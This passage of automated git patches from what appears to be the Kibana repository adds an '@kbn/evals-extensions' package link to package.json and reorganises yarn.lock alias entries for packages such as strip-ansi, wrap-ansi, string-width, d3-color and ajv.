+"strip-ansi-cjs@npm:strip-ansi@^6.0.1", strip-ansi@6.0.1, strip-ansi@^6.0.0, strip-ansi@^6.0.1:
   version "6.0.1"
   resolved "https://registry.yarnpkg.com/strip-ansi/-/strip-ansi-6.0.1.tgz#9e26c63d30f53443e9489495b2105d37b67a85d9"
   integrity sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==
@@ -35673,7 +35638,7 @@ workerpool@^6.5.1:
   resolved "https://registry.yarnpkg.com/workerpool/-/workerpool-6.5.1.tgz#060f73b39d0caf97c6db64da004cd01b4c099544"
   integrity sha512-Fs4dNYcsdpYSAfVxhnl1L5zTksjvOJxtC5hzMNl+1t9B8hTJTdKDyZ5ju7ztgPy+ft9tBFXoOlDNiOT9WUXZlA==
 
-"wrap-ansi-cjs@npm:wrap-ansi@^7.0.0":
+"wrap-ansi-cjs@npm:wrap-ansi@^7.0.0", wrap-ansi@^7.0.0:
   version "7.0.0"
   resolved "https://registry.yarnpkg.com/wrap-ansi/-/wrap-ansi-7.0.0.tgz#67e145cff510a6a6984bdf1152911d69d2eb9e43"
   integrity sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==
@@ -35699,15 +35664,6 @@ wrap-ansi@^6.0.1, wrap-ansi@^6.2.0:
     string-width "^4.1.0"
     strip-ansi "^6.0.0"
 
-wrap-ansi@^7.0.0:
-  version "7.0.0"
-  resolved "https://registry.yarnpkg.com/wrap-ansi/-/wrap-ansi-7.0.0.tgz#67e145cff510a6a6984bdf1152911d69d2eb9e43"
-  integrity sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==
-  dependencies:
-    ansi-styles "^4.0.0"
-    string-width "^4.1.0"
-    strip-ansi "^6.0.0"
-
 wrap-ansi@^8.1.0:
   version "8.1.0"
   resolved "https://registry.yarnpkg.com/wrap-ansi/-/wrap-ansi-8.1.0.tgz#56dc22368ee570face1b49819975d9b9a5ead214"

From c8720adef21e2f77692204dcc7935eae2922d2e4 Mon Sep 17 00:00:00 2001
From: kibanamachine <42973632+kibanamachine@users.noreply.github.com>
Date: Fri, 27 Mar 2026 05:32:27 +0000
Subject: [PATCH 14/15] Changes from node scripts/lint.js --fix

---
 package.json | 1 +
 1 file changed, 1 insertion(+)

diff --git a/package.json b/package.json
index 9f73cc43e0156..9e3ca568a85ef 100644
--- a/package.json
+++ b/package.json
@@ -1690,6 +1690,7 @@
     "@kbn/eslint-plugin-telemetry": "link:packages/kbn-eslint-plugin-telemetry",
     "@kbn/esql-resource-browser-storybook-config": "link:src/platform/packages/shared/kbn-esql-resource-browser/.storybook",
     "@kbn/evals": "link:x-pack/platform/packages/shared/kbn-evals",
+    "@kbn/evals-extensions": "link:x-pack/platform/packages/shared/kbn-evals-extensions",
     "@kbn/evals-phoenix-executor": "link:x-pack/platform/packages/shared/kbn-evals-phoenix-executor",
     "@kbn/evals-suite-agent-builder": "link:x-pack/platform/packages/shared/agent-builder/kbn-evals-suite-agent-builder",
     "@kbn/evals-suite-endpoint": "link:x-pack/solutions/security/packages/kbn-evals-suite-endpoint",

From 4643b7e0d66e299488a0aa65d7aecb9491839981 Mon Sep 17 00:00:00 2001
From: kibanamachine <42973632+kibanamachine@users.noreply.github.com>
Date: Fri, 27 Mar 2026 05:42:12 +0000
Subject: [PATCH 15/15] Changes from node scripts/lint.js --fix

---
 yarn.lock | 54 +++++++++++++++++++++++++++++++++++++++++++++++++-----
 1 file changed, 49 insertions(+), 5 deletions(-)

diff --git a/yarn.lock b/yarn.lock
index c92889f259ea6..4834031837a22 100644
--- a/yarn.lock
+++ b/yarn.lock
@@ -2455,7 +2455,7 @@
   resolved "https://registry.yarnpkg.com/@elastic/filesaver/-/filesaver-1.1.2.tgz#1998ffb3cd89c9da4ec12a7793bfcae10e30c77a"
   integrity sha512-YZbSufYFBhAj+S2cJgiKALoxIJevqXN2MSr6Yqr42rJdaPuM31cj6pUDwflkql1oDjupqD9la+MfxPFjXI1JFQ==
 
-"@elastic/kibana-d3-color@npm:@elastic/kibana-d3-color@2.0.1", "d3-color@1 - 2", "d3-color@npm:@elastic/kibana-d3-color@2.0.1":
+"@elastic/kibana-d3-color@npm:@elastic/kibana-d3-color@2.0.1":
   version "2.0.1"
   resolved "https://registry.yarnpkg.com/@elastic/kibana-d3-color/-/kibana-d3-color-2.0.1.tgz#f83b9c2fea09273a918659de04d5e8098c82f65c"
   integrity sha512-YZ8hV2bWNyYi833Yj3UWczmTxdHzmo/Xc2IVkNXr/ZqtkrTDlTLysCyJm7SfAt9iBy6EVRGWTn8cPz8QOY6Ixw==
@@ -6827,6 +6827,10 @@
   version "0.0.0"
   uid ""
 
+"@kbn/evals-extensions@link:x-pack/platform/packages/shared/kbn-evals-extensions":
+  version "0.0.0"
+  uid ""
+
 "@kbn/evals-phoenix-executor@link:x-pack/platform/packages/shared/kbn-evals-phoenix-executor":
   version "0.0.0"
   uid ""
@@ -12074,7 +12078,7 @@
   resolved "https://registry.yarnpkg.com/@readme/openapi-schemas/-/openapi-schemas-3.1.0.tgz#5ff4b704af6a8b108f9d577fd87cf73e9e7b3178"
   integrity sha512-9FC/6ho8uFa8fV50+FPy/ngWN53jaUu4GRXlAjcxIRrzhltJnpKkBG2Tp0IDraFJeWrOpk84RJ9EMEEYzaI1Bw==
 
-"@redocly/ajv@^8.11.2", "@redocly/ajv@^8.18.0", "ajv@npm:@redocly/ajv@8.18.0":
+"@redocly/ajv@^8.11.2", "@redocly/ajv@^8.18.0":
   version "8.18.0"
   resolved "https://registry.yarnpkg.com/@redocly/ajv/-/ajv-8.18.0.tgz#e6c7ba549111838baa950bc31acbc84b06f0239f"
   integrity sha512-F+LMD2IDIXuHxgpLJh3nkLj9+tSaEzoUWd+7fONGq5pe2169FUDjpEkOfEpoGLz1sbZni/69p07OsecNfAOpqA==
@@ -16092,6 +16096,16 @@ ajv@^6.12.2, ajv@^6.12.4, ajv@^6.12.5:
     json-schema-traverse "^0.4.1"
     uri-js "^4.2.2"
 
+"ajv@npm:@redocly/ajv@8.18.0":
+  version "8.18.0"
+  resolved "https://registry.yarnpkg.com/@redocly/ajv/-/ajv-8.18.0.tgz#e6c7ba549111838baa950bc31acbc84b06f0239f"
+  integrity sha512-F+LMD2IDIXuHxgpLJh3nkLj9+tSaEzoUWd+7fONGq5pe2169FUDjpEkOfEpoGLz1sbZni/69p07OsecNfAOpqA==
+  dependencies:
+    fast-deep-equal "^3.1.3"
+    fast-uri "^3.0.1"
+    json-schema-traverse "^1.0.0"
+    require-from-string "^2.0.2"
+
 anser@^2.1.1:
   version "2.3.2"
   resolved "https://registry.yarnpkg.com/anser/-/anser-2.3.2.tgz#e2da9d10759a4243a5819595f4f46ec369970c5b"
@@ -19178,6 +19192,11 @@ d3-collection@^1.0.7:
   resolved "https://registry.yarnpkg.com/d3-collection/-/d3-collection-1.0.7.tgz#349bd2aa9977db071091c13144d5e4f16b5b310e"
   integrity sha512-ii0/r5f4sjKNTfh84Di+DpztYwqKhEyUlKoPrzUFfeSkWxjW49xU2QzO9qrPrNkpdI0XJkfzvmTu8V2Zylln6A==
 
+"d3-color@1 - 2", "d3-color@npm:@elastic/kibana-d3-color@2.0.1":
+  version "2.0.1"
+  resolved "https://registry.yarnpkg.com/@elastic/kibana-d3-color/-/kibana-d3-color-2.0.1.tgz#f83b9c2fea09273a918659de04d5e8098c82f65c"
+  integrity sha512-YZ8hV2bWNyYi833Yj3UWczmTxdHzmo/Xc2IVkNXr/ZqtkrTDlTLysCyJm7SfAt9iBy6EVRGWTn8cPz8QOY6Ixw==
+
 "d3-color@1 - 3", d3-color@^3.1.0:
   version "3.1.0"
   resolved "https://registry.yarnpkg.com/d3-color/-/d3-color-3.1.0.tgz#395b2833dfac71507f12ac2f7af23bf819de24e2"
@@ -32728,7 +32747,7 @@ string-length@^4.0.1:
     char-regex "^1.0.2"
     strip-ansi "^6.0.0"
 
-"string-width-cjs@npm:string-width@^4.2.0", string-width@^4.1.0, string-width@^4.2.0, string-width@^4.2.3:
+"string-width-cjs@npm:string-width@^4.2.0":
   version "4.2.3"
   resolved "https://registry.yarnpkg.com/string-width/-/string-width-4.2.3.tgz#269c7117d27b05ad2e536830a8ec895ef9c6d010"
   integrity sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==
@@ -32746,6 +32765,15 @@ string-width@^1.0.1:
     is-fullwidth-code-point "^1.0.0"
     strip-ansi "^3.0.0"
 
+string-width@^4.1.0, string-width@^4.2.0, string-width@^4.2.3:
+  version "4.2.3"
+  resolved "https://registry.yarnpkg.com/string-width/-/string-width-4.2.3.tgz#269c7117d27b05ad2e536830a8ec895ef9c6d010"
+  integrity sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==
+  dependencies:
+    emoji-regex "^8.0.0"
+    is-fullwidth-code-point "^3.0.0"
+    strip-ansi "^6.0.1"
+
 string-width@^5.0.1, string-width@^5.1.2:
   version "5.1.2"
   resolved "https://registry.yarnpkg.com/string-width/-/string-width-5.1.2.tgz#14f8daec6d81e7221d2a357e668cab73bdbca794"
@@ -32846,7 +32874,14 @@ stringify-object@^3.2.1:
     is-obj "^1.0.1"
     is-regexp "^1.0.0"
 
-"strip-ansi-cjs@npm:strip-ansi@^6.0.1", strip-ansi@6.0.1, strip-ansi@^6.0.0, strip-ansi@^6.0.1:
+"strip-ansi-cjs@npm:strip-ansi@^6.0.1":
+  version "6.0.1"
+  resolved "https://registry.yarnpkg.com/strip-ansi/-/strip-ansi-6.0.1.tgz#9e26c63d30f53443e9489495b2105d37b67a85d9"
+  integrity sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==
+  dependencies:
+    ansi-regex "^5.0.1"
+
+strip-ansi@6.0.1, strip-ansi@^6.0.0, strip-ansi@^6.0.1:
   version "6.0.1"
   resolved "https://registry.yarnpkg.com/strip-ansi/-/strip-ansi-6.0.1.tgz#9e26c63d30f53443e9489495b2105d37b67a85d9"
   integrity sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==
@@ -35638,7 +35673,7 @@ workerpool@^6.5.1:
   resolved "https://registry.yarnpkg.com/workerpool/-/workerpool-6.5.1.tgz#060f73b39d0caf97c6db64da004cd01b4c099544"
   integrity sha512-Fs4dNYcsdpYSAfVxhnl1L5zTksjvOJxtC5hzMNl+1t9B8hTJTdKDyZ5ju7ztgPy+ft9tBFXoOlDNiOT9WUXZlA==
 
-"wrap-ansi-cjs@npm:wrap-ansi@^7.0.0", wrap-ansi@^7.0.0:
+"wrap-ansi-cjs@npm:wrap-ansi@^7.0.0":
   version "7.0.0"
   resolved "https://registry.yarnpkg.com/wrap-ansi/-/wrap-ansi-7.0.0.tgz#67e145cff510a6a6984bdf1152911d69d2eb9e43"
   integrity sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==
@@ -35664,6 +35699,15 @@ wrap-ansi@^6.0.1, wrap-ansi@^6.2.0:
     string-width "^4.1.0"
     strip-ansi "^6.0.0"
 
+wrap-ansi@^7.0.0:
+  version "7.0.0"
+  resolved "https://registry.yarnpkg.com/wrap-ansi/-/wrap-ansi-7.0.0.tgz#67e145cff510a6a6984bdf1152911d69d2eb9e43"
+  integrity sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==
+  dependencies:
+    ansi-styles "^4.0.0"
+    string-width "^4.1.0"
+    strip-ansi "^6.0.0"
+
 wrap-ansi@^8.1.0:
   version "8.1.0"
   resolved "https://registry.yarnpkg.com/wrap-ansi/-/wrap-ansi-8.1.0.tgz#56dc22368ee570face1b49819975d9b9a5ead214"